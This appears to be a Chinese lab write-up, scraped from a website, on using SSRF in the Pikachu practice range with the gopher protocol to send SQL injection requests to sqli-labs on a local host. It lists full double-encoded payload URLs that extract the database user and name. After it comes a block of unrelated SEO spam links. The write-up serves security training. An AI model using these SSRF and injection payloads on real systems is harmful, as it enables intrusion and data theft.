当前位置: 首页 > wzjs >正文

长沙好的网站建设公司哪家好网盟推广

长沙好的网站建设公司哪家好,网盟推广,动态网站 教程,太原域名注册实验环境; Centos7.6上同时安装sqli-lib和pikachu 一.Gopher 协议对内网 Web 服务进行 sql 注入 GET 类型 我们先访问sqli-lib第1关 然后我们构造URL: http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?urlhttp://192.168.112.12/sql…

实验环境;

Centos7.6上同时安装sqli-lib和pikachu

一.Gopher 协议对内网 Web 服务进行 sql 注入 GET 类型

我们先访问sqli-lib第1关

然后我们构造URL:

http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.112.12/sqli-

labs/Less-1/?id=-1' union select 1,user(),database() --+

我们再到pikachu靶场里面进行ssrf实验:

发现报错了,这里我们需要进行两次编码:

为什么要 2 次编码?

1. 首先我们发给服务器的时候 URL 地址中不能包含特殊字符,需要第一次编码。先解码%25

2. 服务器接收到我们的 URL 地址之后由 url_exec()解析 URL 地址,此时服务器进行第二次解码。

第二次解码则解码空格以及特殊字符。

第一次:只对传递的参数id进行编码。

http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.112.12/sqli-labs/Less-1/?id=-1'union%20select%201%2Cuser()%2Cdatabase()--%20%2B第二次:

http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.112.12/sqli-labs/Less-1/?id=-1'union%2520select%25201%252Cuser()%252Cdatabase()--%2520%252B

然后我们可以看到成功利用pikachu靶场访问sqli-lib并利用sql注入漏洞。

我们再bp抓包:

利用脚本进行编码:

_GET%20/sqli-labs/Less-1/%3Fid%3D-1%2527union%2520select%25201%2Cuser%28%29%2Cdatabase%28%29--%2520%2B%20HTTP/1.1%0D%0AHost%3A%20192.168.112.12%0D%0A
 

然后拼接URL:gopher://192.168.112.12:80/_GET%20/sqli-labs/Less-1/%3Fid%3D-1%2527union%2520select%25201%2Cuser%28%29%2Cdatabase%28%29--%2520%2B%20HTTP/1.1%0D%0AHost%3A%20192.168.112.12%0D%0A

然后我们对其进行二次编码:

http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?url=gopher%3A%2F%2F192.168.112.12%3A80%2F_GET%2520%2Fsqli-labs%2FLess-1%2F%253Fid%253D-1%252527union%252520select%2525201%252Cuser%2528%2529%252Cdatabase%2528%2529--%252520%252B%2520HTTP%2F1.1%250D%250AHost%253A%2520192.168.112.12%250D%250A

我们也是成功利用gopher协议完成SSRF的GET请求。

二.Gopher 协议对内网 Web 服务进行 sql 注入POST 类型

我们依旧先打开sqli-lab靶场进入11关:

然后bp抓包

我们利用编码脚本先对POST请求进行编码:

然后我们得到结果构造URL:

在前面添加:gopher://192.168.112.12/

然后我们在pikachu里面进行URL构造:

再编码一次就可以了。

我们也是成功利用POST请求拿到sqli-lab的数据库名称和user表

 

http://www.dtcms.com/wzjs/334301.html

相关文章:

  • 村建站全称搜索引擎营销的分类
  • 游戏推广对接平台seo怎么去优化
  • 网站为什么要挂服务器网店代运营正规公司
  • 做网站的微信号株洲seo推广
  • 金坛网站建设哪家好网站关键词优化系统
  • 家居网站应该怎么做优化大师的功能有哪些
  • 常州网站建设手机百度app免费下载
  • 企业网站设计经典案例大型的营销型网站
  • 做网站除了广告还有什么收入的廊坊seo整站优化软件
  • 光谷网站建设公司什么是关键词
  • 怎样做优惠券网站学seo如何入门
  • 漳州做网站建设公司网站制作费用
  • 网站建设续签合同怎么签引擎优化搜索
  • 网站分类目录大全手机流畅优化软件
  • 钟表网站模板seo站内优化公司
  • 潍坊最早做网站的公司一级消防工程师考试
  • 山东网站建设企业邮箱怎么注册
  • 网站用哪些系统做的好成都seo优化公司排名
  • 网站后台代码添加图片合肥搜索引擎推广
  • 北京网站建设 专业10年营销策划公司介绍
  • phcms wordpress百度seo推广是什么
  • 怎么在wordpress上设计网站电脑培训网上课程
  • 安徽元鼎建设公司网站站内推广方案
  • 大型b2c网站开发百度招商加盟推广
  • 广州seo网站推广优化网络软文发布
  • 网络设计接单windows优化大师官方网站
  • 哪里有营销型网站制作培训课程
  • 网站建设中企自己怎么优化关键词
  • 网页开发界面设计成都百度网站排名优化
  • 用织梦做的网站是模板的吗在线视频观看免费视频22